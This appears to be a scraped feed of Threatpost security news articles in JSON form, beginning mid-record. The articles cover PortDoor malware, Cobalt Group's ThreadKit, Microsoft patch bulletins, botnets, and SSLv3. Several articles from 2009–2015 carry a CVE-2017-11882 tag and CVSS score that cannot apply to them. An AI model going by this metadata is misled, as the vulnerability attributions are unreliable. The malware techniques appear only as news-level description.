The initial target of the attack was a general director there named Igor Vladimirovich, researchers said, who received a phishing email.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe attack began with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder \u2013 a tool that Cybereason said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428. 
RoyalRoad generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe use of RoyalRoad is one of the reasons the company believes Chinese cybercriminals to be behind the attack.\n\n\u201cThe accumulated evidence, such as the infection vector, social-engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware, all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\u201d according to a [Cybereason analysis](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>), published Friday.\n\n## **A Quiet Espionage Malware**\n\nThe RoyalRoad tool was seen fetching the unique PortDoor sample once the malicious RTF document is opened, which researchers said was designed with stealth in mind. It has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more.\n\nOnce executed, the backdoor decrypts the strings using a hardcoded 0xfe XOR key in order to retrieve its configuration information. 
This includes the command-and-control (C2) server address, a victim identifier and some other minor information.\n\nThe malware then creates an additional file in %temp% with the hardcoded name \u201c58097616.tmp\u201d and writes the GetTickCount value multiplied by a random number to it: \u201cThis can be used as an additional identifier for the target, and also as a placeholder for the previous presence of this malware,\u201d researchers explained.\n\nAfter that, it establishes its C2 connection, which facilitates the transfer of data using TCP over raw sockets, or via HTTPS \u2013 with proxy support. At this point, Cybereason said that PortDoor also has the ability to achieve privilege escalation by stealing explorer.exe tokens.\n\nThen, the malware gathers basic PC info to be sent to the C2, which it bundles with a unique identifier, after which it awaits further instructions.\n\nThe C2 commands are myriad:\n\n * List running processes\n * Open process\n * Get free space in logical drives\n * Files enumeration\n * Delete file\n * Move file\n * Create process with a hidden window\n * Open file for simultaneous operations\n * Write to file\n * Close handle\n * Open file and write directly to disk\n * Look for the \u201cKr*^j4\u201d string\n * Create pipe, copy data from it and AES encrypt\n * Write data to file, append with \u201c\\n\u201d\n * Write data to file, append with \u201cexit\\n\u201d\n\nPortDoor also employs an anti-analysis technique known as dynamic API resolving, according to the analysis.\n\n\u201cThe backdoor is able to hide most of its main functionality and avoid static detection of suspicious API calls by dynamically resolving its API calls instead of using static imports,\u201d researchers explained.\n\n## **Chinese APTs in the Cyberattack Mix \u2013 Probably**\n\nCybereason\u2019s analysis did not yield a specific Chinese APT actor who would likely be responsible for the attack. 
However, the researchers said they could make some educated guesses.\n\n\u201cThere are a couple of known Chinese APT groups that share quite a few similarities with the threat actor behind the new malware samples analyzed,\u201d according to the report.\n\nFor instance, the RTF file used in the attack was weaponized with RoyalRoad v7, which was previously observed being used by the Tonto Team, TA428 and Rancor APTs.\n\n\u201cBoth the Tonto Team and TA428 threat actors have been observed attacking Russian organizations in the past, and more specifically attacking research and defense-related targets,\u201d according to the analysis. \u201cWhen comparing the spear-phishing email and malicious documents in these attacks with previously examined phishing emails and lure documents used by the Tonto Team to attack Russian organizations, there are certain similarities in the linguistic and visual style used by the attackers in the phishing emails and documents.\u201d\n\nThat said, the PortDoor malware doesn\u2019t share significant code similarities with previously known malware used by those groups \u2013 leading Cybereason to conclude that it is not a variant of a known malware, which makes it useless in attribution efforts.\n\n\u201cLastly, we are also aware that there could be other groups, known or yet unknown, that could be behind the attack and the development of the PortDoor backdoor,\u201d researchers concluded. \u201cWe hope that as time goes by, and with more evidence gathered, the attribution could be more concrete.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. 
Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-04-30T19:32:34", "type": "threatpost", "title": "PortDoor Espionage Malware Takes Aim at Russian Defense Sector", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-04-30T19:32:34", "id": "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "href": "https://threatpost.com/portdoor-espionage-malware-takes-aim-at-russian-defense-sector/165770/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:52:39", "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. Researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on targets\u2019 computers. 
Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, its capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. 
This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. 
EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "cvss3": {}, "published": "2018-05-28T12:21:42", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:15:20", "description": "Despite the high-profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior. In a new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, the Cobalt Group has recently been observed updating its arsenal with a new version of the ThreadKit malware.\n\nIn a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments including:\n\n * Despite an arrest earlier this year of a key member, the Cobalt Group remains active.\n * A new version of the malware ThreadKit is being actively distributed in October 2018.\n * The CobInt trojan uses an XOR-based obfuscation technique.\n\n## Reemergence of Cobalt Group\n\nThe Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In one single campaign, it was credited for stealing over $32,000 from six Eastern European ATMs. 
In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.\n\nIn March, the Cobalt Group was dealt a severe blow when EUROPOL [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the \u201ccriminal mastermind\u201d behind the group in Alicante, Spain. Since then, the group [was observed by Positive Technologies](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear-phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.\n\n\u201cIn 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America. Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0**\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on exploits used for remote code execution found in Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)) and, notably, [the now-patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. 
As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing an RTF Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. \u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of the ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into its own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out that the update includes a new download URL where the malware code \u201cobjects\u201d are downloaded from and later combined to create the executable. \u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills**\n\nThe ThreadKit payload is the trojan CobInt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation, an XOR routine used to decode the initial CobInt payload. An XOR cipher is a simple symmetric scheme: applying the XOR function with the key encrypts the data, and applying it again with the same key decrypts it.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. 
So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrest of Cobalt Group members has only temporarily slowed Carbanak/Cobalt threat actors. In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "cvss3": {}, "published": "2018-12-11T18:40:00", "type": "threatpost", "title": "Cobalt Group Pushes Revamped ThreadKit Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:03:28", "description": "Dennis Fisher talks with Richard Boscovich of the Microsoft Digital Crimes Unit about the operation to take down the Zeus botnet, how the company works with partners and law enforcement on these operations and the importance of getting the word out to consumers about the danger of botnets.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, "published": "2012-03-27T20:03:18", "type": "threatpost", "title": "Richard Boscovich on the Zeus Botnet Takedown", "bulletinFamily": "info", 
"cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:32:31", "id": "THREATPOST:809BED35A98A53099CE1EC723FA950F2", "href": "https://threatpost.com/richard-boscovich-zeus-botnet-takedown-032712/76374/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "As expected, Microsoft delivered a patch today for a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) that was disclosed by HP\u2019s Zero Day Initiative three weeks ago, six months after it was reported to the ZDI.\n\nThe IE8 patch, [MS14-035](<https://technet.microsoft.com/library/security/ms14-035>), is included in a cumulative Internet Explorer rollup that patches 59 flaws in the browser. Most of them are remote-code execution bugs rolling all the way back to IE 6 running on Windows Server 2003 SP2.\n\nThe zero day affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. 
Microsoft said in May that it was aware of the issue.\n\n\u201cAlthough no attacks have been detected in the wild, the ZDI advisory has given attackers a head start understanding this vulnerability, possibly reducing the time required for researchers to reverse engineer the fix and devise exploit code,\u201d said Craig Young, a security researcher with Tripwire.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nExperts are urging IT administrators to take a close look at a bulletin for Microsoft Word, [MS14-034](<https://technet.microsoft.com/library/security/ms14-034>), which while rated important by Microsoft, should be the next highest patching priority behind IE.\n\nThe bug affects Microsoft Word 2007; users could be exposed to remote code execution exploits if a malicious Word document is opened on a vulnerable computer.\n\n\u201cMicrosoft rates it only \u2018important\u2019 because user interaction is required\u2014one has to open a Word file\u2014but it allows the attacker Remote Code Execution. In addition, attackers have become quite skilled at tricking users into opening files,\u201d said Qualys CTO Wolfgang Kandek. \u201cWho wouldn\u2019t open a document that brings new information about the company\u2019s retirement plan? The Word vulnerability is in the newer DOCX file format and only applies to the 2007 release. If you are using the newer versions of Office/Word 2010 or 2013 you are not affected.\u201d\n\nThe second critical bulletin, [MS14-036](<https://technet.microsoft.com/library/security/ms14-036>), patches remote code execution bugs in Microsoft graphics in Office and Lync that could be exploited by users visiting malicious webpages or opening a malicious Office file.\n\n\u201cGraphics parsing requires complex logic and has frequently been associated with attack vectors,\u201d said Kandek. 
\u201cIt affects Windows, Office and the Lync IM client because they all bring their own copy.\u201d\n\nThis month brings 2014\u2019s total number of bulletins issued by Microsoft to 36, well below last year\u2019s pace of 46 through June.\n\n\u201cWe have become accustomed to seeing around 100 security bulletins for Microsoft products a year, but it looks as if we are in for fewer this year. This runs counter to the general tendency of the year which has already seen its share of big breaches, 0-days and the big Heartbleed vulnerability in OpenSSL,\u201d Kandek said. \u201cMaybe the reduced count is based on the increased presence of vulnerability brokers that buy up vulnerabilities for internal use? We will see how the second part of the year develops.\u201d\n\nThe remaining bulletins are rated important and include a pair of information disclosure bugs, one denial-of-service flaw and a tampering vulnerability.\n\n * [MS14-033](<https://technet.microsoft.com/library/security/ms14-033>) addresses an information disclosure vulnerability in Microsoft XML Core Services; an exploit on a website designed to invoke XML Core Services through IE could leak data to an attacker.\n * [MS14-032](<https://technet.microsoft.com/library/security/ms14-032>) also patches an information disclosure bug in Microsoft Lync Server. A user tricked into joining a Lync meeting by clicking on a malicious meeting URL could be exploited.\n * [MS14-031](<https://technet.microsoft.com/library/security/ms14-031>) fixes a denial-of-service bug in TCP. An attacker sending a malicious sequence of packets to the target system could cause it to crash.\n * [MS14-030](<https://technet.microsoft.com/library/security/ms14-030>) patches a vulnerability in Remote Desktop that could allow tampering, Microsoft said. 
If an attacker has man in the middle access to the same network segment as the targeted system during an RDP session and sends malicious RDP packets, they could exploit the vulnerability.\n\n**Adobe Patches Flash Player**\n\nAdobe released a new version of Flash Player that addresses a [critical vulnerability](<http://helpx.adobe.com/security/products/flash-player/apsb14-16.html>) in the software.\n\nFlash 13.0.0.214 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.359 and earlier versions for Linux are affected.\n\nAdobe said there are no active exploits against these vulnerabilities.\n", "cvss3": {}, "published": "2014-06-10T14:09:16", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday security updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-13T15:41:16", "id": "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "href": "https://threatpost.com/microsoft-patches-ie8-zero-day-critical-word-bug/106572/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "[](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>)\n\nLess than a week after the [publication of exploit code](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>) for a gaping hole in the FTP Service in Microsoft Internet Information Services (IIS), attackers are launching what is described as \u201climited attacks\u201d against Windows users.\n\nMicrosoft has updated its security advisory to warn of the new attacks and added new mitigation workarounds for business running (IIS) 5.0, 5.1, and 6.0.\n\nIn addition to the in-the-wild attacks, Microsoft warned that a new proof of concept has been published to demonstrate a denial-of-service attack on Windows XP and Windows Server 2003 with read access to the File Transfer Protocol (FTP) service.\n\n\u201cThis does 
not require Write access,\u201d the company warned. \n\nAlso, a new proof of concept allowing DoS was separately disclosed that affects the version of FTP 6 which shipped with Windows Vista and Windows Server 2008. \n\n * Customers should be aware that the Download Center has FTP 7.5 available for Windows Vista and Windows Server 2008. FTP 7.5 is not vulnerable to any of these exploits.\n\nEarlier this week, [Microsoft issued an advisory](<https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/>) to confirm the severity of this vulnerability, which allows remote code execution on affected systems running the FTP service and connected to the Internet.\n", "cvss3": {}, "published": "2009-09-08T11:58:04", "type": "threatpost", "title": "Attackers Pounce on Microsoft FTP in IIS Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:48", "id": "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "href": "https://threatpost.com/attackers-pounce-microsoft-ftp-iis-vulnerability-090809/72235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:58", "description": "There\u2019s an odd bit of behavior that some Windows systems will exhibit when certain kinds of installers are launched, automatically elevating the privileges of the installer process to system-level privileges. In theory, the issue shouldn\u2019t be exploitable because at one point in the process the system will generate an MD5 hash of a DLL that\u2019s to be loaded, and unless the attacker can replace that DLL with a malicious one that sports the same hash, an attack is impossible. 
But those constraints may not hold for all attackers, a researcher says.\n\nThe weirdness in Windows 7 and Windows Server 2008 was identified by Cesar Cerrudo of IOActive, and he spent some time looking into exactly what causes it and whether he\u2019d be able to exploit the condition. The issue arises when an installer for a program that is already installed on a given machine is executed. When one of those installers is run, it will automatically elevate the privileges of the current installer process to the System level. That would theoretically give an attacker a local elevation of privilege bug, granting him system privileges.\n\n\u201cHowever, an interesting issue arises during the installation process when running this kind of installer: a temporary file is created in `C:\\Users\\username\\AppData\\Local\\Temp`, which is the temporary folder for the current user. The created file is named `Hx????.tmp` (where `????` seem to be random hex numbers), and it seems to be a COM DLL from Microsoft Help Data Services Module, in which its original name is `HXDS.dll`. This DLL is later loaded by `msiexec.exe` process running under the System account that is launched by the Windows installer service during the installation process,\u201d [Cerrudo wrote in a blog post](<http://blog.ioactive.com/2012/01/free-windows-vulnerability-for-nsa.html?m=1>) explaining the issue.\n\n\u201cWhen the DLL file is loaded, the code in the DLL file runs as the System user with full privileges. At first sight this seems to be an elevation of privileges vulnerability since the folder where the DLL file is created is controlled by the current user, and the DLL is then loaded and run under the System account, meaning any user could run code as the System user by replacing the DLL file with a specially-crafted one before the DLL is loaded and executed.\u201d\n\nBut there\u2019s more to it than just that. 
In order to exploit the weakness, Cerrudo said that an attacker likely would need to create a malicious DLL with the same MD5 hash as the benign one and then replace the original one with the DLL containing the exploit code. The attack in this case would be against the MD5 algorithm itself, because the attacker would need to create a second message with the same hash as the known message. Known as a second preimage attack, it is practically out of reach for most individual attackers.\n\nHowever, Cerrudo says that it may well be possible for an organization such as an intelligence agency that has massive amounts of compute power and resources to be able to execute such an attack. MD5 is known to have a variety of weaknesses, including collision problems, and Microsoft itself stopped including it in its products seven years ago. Cerrudo said that while exploiting the issue he found via a second preimage attack is likely impractical for most attackers, there may be other vectors out there that could accomplish the same task.\n\n\u201cI think that there could be others. I dedicated some time to it, I did research and tried different ways to exploit the issue but this doesn\u2019t mean that I exhausted all possibilities. It\u2019s just a matter of dedicating some time and trying different options like combining this issue with others, abusing some Windows Installer functionality, timing and blocking issues, etc. These are the kind of things I would try if I would have time. 
I wouldn\u2019t discard that someone can come up with an idea to exploit it,\u201d Cerrudo said via email.\n", "cvss3": {}, "published": "2012-01-18T15:20:13", "type": "threatpost", "title": "Elevating Privileges Via Windows Installers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:58", "id": "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "href": "https://threatpost.com/elevating-privileges-windows-installers-011812/76111/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Long thought dead, the peer-to-peer (P2P) ZeroAccess botnet has resurfaced, and as of just a few weeks ago, has returned to propagating click-fraud scams.\n\nResearchers with Dell\u2019s SecureWorks [revealed Wednesday](<http://www.secureworks.com/resources/blog/zeroaccess-botnet-resumes-click-fraud-activity-after-six-month-break/>) that they witnessed the botnet restart itself from March 21 to July 2, 2014 and that halfway through this month \u2013 six months after it was last seen \u2013 the botnet has apparently gone back to its old ways and is again doling out click-fraud templates.\n\nClick-fraud, one of the easier techniques cybercriminals use to monetize malware, is essentially the embezzling of ad revenue from clicks that don\u2019t come from legitimate customers.\n\nDespite the botnet\u2019s resurfacing, researchers insist it hasn\u2019t grown or even tried to incorporate new compromises. 
Instead the botnet, which has split into two smaller botnets that use different UDP ports, is built around hosts from past infections.\n\nAs seen below, researchers found ZeroAccess in two smaller botnets in both 32-bit (blue) and 64-bit (gray) compromised Windows systems.\n\n\n\n\u201cCompromised systems act as nodes in the P2P network, and they periodically receive new templates that include URLs for attack-controlled template servers,\u201d the firm\u2019s Counter Threat Unit (CTU) wrote.\n\nOnce the URLs are visited, like a chain reaction, the bots are redirected to their final destination.\n\nThe unit claims it counted 55,000-plus different IP addresses \u2013 mostly in Japan, India and Russia \u2013 engaging with the botnet from Jan. 17 to Jan. 25. Some may consider 55K small potatoes compared to the botnet\u2019s heyday, when Microsoft cleaned half a million machines of the virus from Feb. to March 2013, but Dell is stressing that for all intents and purposes ZeroAccess should still be considered substantial.\n\nAdding that it may not be able to do what other flashy botnets can, like carry out banking fraud or hold users\u2019 files ransom, ZeroAccess can still wreak havoc on advertisers and machines it infects alike.\n\nIt was thought the [botnet was dead](<http://threatpost.com/microsoft-zeroaccess-botnet-has-been-abandoned/103273>) in December 2013 after Microsoft, along with Europol\u2019s European Cybercrime Centre (EC3), the F.B.I., and the firm A10 [disrupted ZeroAccess\u2019s](<http://threatpost.com/microsoft-and-friends-take-down-zeroaccess-botnet/103122>) two million odd machines. Click-fraud is just one of the botnet\u2019s favorite pastimes. 
ZeroAccess, a/k/a Sirefef, has also been seen hijacking search results and redirecting victims to malicious, information stealing websites and for a short stint the platform was even spotted [facilitating Bitcoin mining](<http://threatpost.com/zeroaccess-botnet-cashing-click-fraud-and-bitcoin-mining-103012/77168>).\n\n[Microsoft greatly curbed](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/100717>) the botnet\u2019s click-fraud tendencies in May 2013 after it added its signature to its Malicious Software Removal Tool (MSRT) and cleaned all the infected machines it could find of ZeroAccess.\n", "cvss3": {}, "published": "2015-01-29T14:25:48", "type": "threatpost", "title": "ZeroAccess Returns, Resumes Click-Fraud Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:27", "id": "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "href": "https://threatpost.com/zeroaccess-botnet-returns-resumes-click-fraud-activity/110736/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:56", "description": "Microsoft is planning to disable support for the weak SSLv3 protocol in Internet Explorer at some undetermined point in the future, and also will remove support for it in the company\u2019s online services soon.\n\nThe security and utility of SSLv3 has been an issue for a long time, but it came into sharper focus earlier this month when researchers at Google released details of a [new attack known as POODLE](<http://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844>) that enables an attacker to decrypt protected content under certain circumstances. If an attacker has control of a target\u2019s Internet connection and can force the victim to run some Javascript in her browser, then he can eventually decrypt the content of a session protected by SSLv3. 
To do so, the attacker needs to be able to force a connection using the outdated protocol, and that can be done by forcing a failed secure connection between a server and client, which will trigger the server to try and renegotiate the secure connection using a different protocol.\n\nSSLv3 is nearly 15 years old and experts have considered it to be a security risk for a long time and have recommended that site operators use newer alternatives such as TLS 1.2. But there are plenty of sites that still support SSLv3 and IE 6, an artifact of a browser, doesn\u2019t support any transport layer security protocols newer than SSLv3 by default. Microsoft officials said the company is planning to remove the ability for IE to fall back to SSLv3 and eventually will disable the protocol by default altogether.\n\n\u201cWe are committed to helping protect our customers and providing the best possible encryption to protect their data. To do this, we\u2019re working to disable fallback to SSL 3.0 in IE, and disable SSL 3.0 by default in IE, and across Microsoft online services, over the coming months,\u201d Tracey Pretorius of the MSRC said in a blog [post](<http://blogs.technet.com/b/msrc/archive/2014/10/29/security-advisory-3009008-released.aspx>).\n\n\u201cMillions of people and thousands of organizations around the world rely on our products and services every day, and while the number of systems that rely on SSL 3.0 exclusively is very small, we recognize that, particularly for enterprises, disabling the protocol may cause some impact. 
